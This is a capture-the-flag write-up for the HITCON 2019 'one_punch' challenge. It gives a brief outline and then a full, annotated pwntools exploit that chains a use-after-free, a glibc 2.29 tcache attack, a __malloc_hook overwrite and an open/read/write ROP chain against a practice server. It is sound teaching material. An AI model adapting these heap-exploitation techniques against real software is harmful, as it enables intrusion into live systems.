hitcon_ctf_2019_one_punch(23/100)

思路

2.29下的tcachesmash利用
覆蓋目標位置后使用后門函數實現tcache攻擊,覆蓋malloc_hook
orw讀flag

EXP

from pwn import *

def s(data):
    """Send *data* to the target as-is (no newline appended)."""
    return p.send(data)


def sa(text, data):
    """Wait until *text* is received, then send str(data) without a newline."""
    return p.sendafter(text, str(data))


def sl(data):
    """Send *data* followed by a newline."""
    return p.sendline(data)


def sla(text, data):
    """Wait until *text* is received, then send str(data) plus a newline."""
    return p.sendlineafter(text, str(data))


def r(num=4096):
    """Receive up to *num* bytes (default 4096)."""
    return p.recv(num)


def ru(text):
    """Receive until *text* appears."""
    return p.recvuntil(text)


def uu32():
    """Receive up to the first 0xf7 byte and unpack the last 4 bytes as a
    little-endian u32 (right-padded with NULs when fewer bytes are present)."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4, "\x00"))


def uu64():
    """Receive up to the first 0x7f byte and unpack the trailing 6 bytes as a
    little-endian u64 (NUL-padded to 8 bytes); the 0x7f prefix is what a
    user-space x86-64 library address ends with."""
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8, "\x00"))


def lg(name, data):
    """Log *data* as a hex value under *name* through pwntools' success logger."""
    return p.success(name + "-> 0x%x" % data)

# context.log_level ='debug'
#p = process('./hitcon_ctf_2019_one_punch')
# Remote challenge instance (the commented-out process() line above is the
# local alternative).  Every hard-coded heap/libc offset further down was
# derived for this deployment; against a different build they are simply wrong.
p = remote('node4.buuoj.cn','26635')
elf = ELF('./hitcon_ctf_2019_one_punch')
# libc resolved from the local binary by pwntools; assumed to be the same build
# as the remote side's (libc.sym['__malloc_hook'] is looked up from it later).
libc = elf.libc

def cmd(choice):
    """Pick a menu entry: wait for the '> ' prompt, then send str(choice) plus a newline."""
    p.sendlineafter('> ', str(choice))

def add(idx, content):
    """Menu option 1 (allocate): select slot *idx*, then send *content* as the
    hero name.  The name is sent raw (sendafter, not sendlineafter), so the
    caller controls every byte that reaches the program."""
    choice, slot = str(1), str(idx)
    p.sendlineafter('> ', choice)
    p.sendlineafter('idx: ', slot)
    p.sendafter('hero name: ', content)

def edit(idx, content):
    """Menu option 2 (edit): select slot *idx*, then send *content* raw as the
    new hero name.  Same wire format as add(), only the menu number differs."""
    choice, slot = str(2), str(idx)
    p.sendlineafter('> ', choice)
    p.sendlineafter('idx: ', slot)
    p.sendafter('hero name: ', content)

def show(idx):
    """Menu option 3 (show): ask the program to print slot *idx*.
    Nothing is read here; callers recvuntil('hero name: ') themselves."""
    choice, slot = str(3), str(idx)
    p.sendlineafter('> ', choice)
    p.sendlineafter('idx: ', slot)

def delete(idx):
    """Menu option 4 (delete): free slot *idx*.  The script later calls show()
    and edit() on slots it has deleted, so the program does not appear to
    invalidate the slot here."""
    choice, slot = str(4), str(idx)
    p.sendlineafter('> ', choice)
    p.sendlineafter('idx: ', slot)

def dbg():
    """Attach gdb to the live target and block until the user continues.
    Only meaningful with the local process() setup; unused in the remote run."""
    gdb.attach(p)
    pause()

def backdoor(content):
    """Hidden menu entry 50056: select it, then send *content* raw with no
    prompt wait and no newline."""
    hidden_choice = str(50056)
    p.sendlineafter('> ', hidden_choice)
    p.send(content)

# --- Stage 1: information leaks through show() on freed slots ------------------
# Seven allocate/free cycles of the same 0x80-byte request at index 0.  Seven
# is the tcache per-bin capacity, so this presumably fills that bin (the
# write-up above mentions tcache); TODO(review): confirm against the heap layout.
for i in range(7):
    add(0,'a'*0x80)
    delete(0)
# show() still prints slot 0 after it was freed: a use-after-free read.  This
# UAF (and the edit()-after-delete() used later) is the primitive the whole
# script stands on; clearing the slot on delete would remove it.
show(0)
p.recvuntil('hero name: ')
# The first 6 bytes of the freed chunk, NUL-padded to a qword, form a heap
# pointer; 0x530 is the binary-specific distance from it to the heap base.
heap_base = u64((p.recv(6).ljust(8,'\x00')))-0x530
lg('heap_base',heap_base)

# Same pattern with a 0x400 request at index 1, then two live allocations and
# one free, so that show(1) prints a libc pointer (again a read after free).
for i in range(7):
    add(1,0x400*'a')
    delete(1)
add(1,0x400*'a')
add(2,0x400*'a')
delete(1)
show(1)
p.recvuntil('hero name: ')
# uu64() takes the 6 bytes ending in 0x7f.  96 and 0x1E4C40 are offsets tied to
# this specific libc build (the write-up states 2.29); they must be rederived
# for any other build.
libc_base = uu64()-96-0x1E4C40
lg('libc_base',libc_base)
#======================================
# --- Stage 2: heap grooming and metadata overwrite ------------------------------
# Address later written into chunk metadata; 0x1f past the heap base is a
# binary-specific location that cannot be derived from this script alone.
backdoor_addr = heap_base + 0x1f
add(1,0x400*'a')
# Six 0xf0 allocate/free cycles at index 2 — one short of the seven used above.
for i in range(6):
    add(2,0xf0*'a')
    delete(2)

# The author's "smbin1"/"smbin2" markers flag the two 0x400 chunks expected to
# end up in a small bin after the surrounding deletes; the exact ordering is
# layout-specific and not verifiable from the script.
add(1,0x400*'a')#smbin1->1
add(2,0x300*'a')
delete(1)
add(2,0x300*'a')
add(2,0x400*'a')#smbin2->2
add(0,0x300*'a')
delete(2)
add(1,0x300*'a')
add(1,0x300*'a')
# NUL-padded file name consumed by the open() in the final ROP chain; it is
# stored in slot 1 so it sits on the heap at a known offset (presumably the
# heap_base+0x3f20 used below — verify).
edit(1,'./flag'.ljust(8,'\x00'))
# Slot 2 was last allocated with 0x300 bytes but edit() is handed 0x300+32:
# the trailing qwords (0, 0x101, two pointers) look like a chunk header and
# appear to land on the neighbouring chunk's metadata — a heap overflow on top
# of the UAF.  A length check in edit() against the allocated size would stop it.
edit(2,'a'*0x300+p64(0)+p64(0x101)+p64(heap_base+0x33e0)+p64(backdoor_addr))
#==========================================
# --- Stage 3: point __malloc_hook at a pivot gadget ------------------------------
malloc_hook = libc_base + libc.sym['__malloc_hook']
add(0,0x217*'a')
delete(0)
# Write-after-free: the first qword of the just-freed 0x217 chunk is replaced
# with the hook address.  For a tcache chunk that qword is its next pointer,
# which matches the write-up's "tcache attack" wording — verify in gdb.
edit(0,p64(malloc_hook))
add(0,'a'*0xf0)#make
# Hidden menu entry twice: a throw-away byte first, then the gadget address.
# Presumably the second call's allocation is the one aliased onto
# __malloc_hook, so the gadget becomes the hook — confirm.
backdoor('a')
# add_rsp_0x38 = 0xddadd+libc_base
# lg('add_rsp_0x38',add_rsp_0x38)
# Gadget offset named by the author as an "add rsp, 0x48; ret" pivot; it is
# specific to the remote libc build (the 0x38 variant is left commented out).
add_rsp_0x48 = libc_base + 0x8cfd6
backdoor(p64(add_rsp_0x48))
#==========================================
# --- Stage 4: open/read/write ROP chain --------------------------------------------
# All gadget offsets are specific to the remote libc build; a wrong offset
# fails with nothing more than a remote crash.
pop_rdi_ret = 0x26542+libc_base
pop_rsi_ret = 0x26f9e+libc_base
pop_rdx_ret = 0x12bda6+libc_base
pop_rax_ret = 0x47cf8+libc_base
syscall_ret = 0xcf6c5+libc_base


# open(heap_base+0x3f20, 0 /* O_RDONLY */, 0) — rax=2; the path is the
# "./flag" string written into slot 1 earlier (presumed to sit at that offset).
rops = p64(pop_rdi_ret)+p64(heap_base+0x3f20)
rops += p64(pop_rsi_ret)+p64(0)
rops += p64(pop_rdx_ret)+p64(0)
rops += p64(pop_rax_ret)+p64(2)
rops += p64(syscall_ret)
# read(3, heap_base+0x22b0, 0x100) — rax=0; fd 3 assumes no other descriptor
# was opened by the program before this point.
rops += p64(pop_rdi_ret)+p64(3)
rops += p64(pop_rsi_ret)+p64(heap_base+0x22b0)
rops += p64(pop_rdx_ret)+p64(0x100)
rops += p64(pop_rax_ret)+p64(0)
rops += p64(syscall_ret)
# write(1, heap_base+0x22b0, 0x100) — rax=1; echoes the buffer to stdout.
rops += p64(pop_rdi_ret)+p64(1)
rops += p64(pop_rsi_ret)+p64(heap_base+0x22b0)
rops += p64(pop_rdx_ret)+p64(0x100)
rops += p64(pop_rax_ret)+p64(1)
rops += p64(syscall_ret)
# The chain is delivered through an ordinary allocation; the hooked malloc and
# the rsp pivot set up in the previous stage are presumably what transfer
# control into it (not verifiable from the script alone).
add(0,rops)

p.interactive()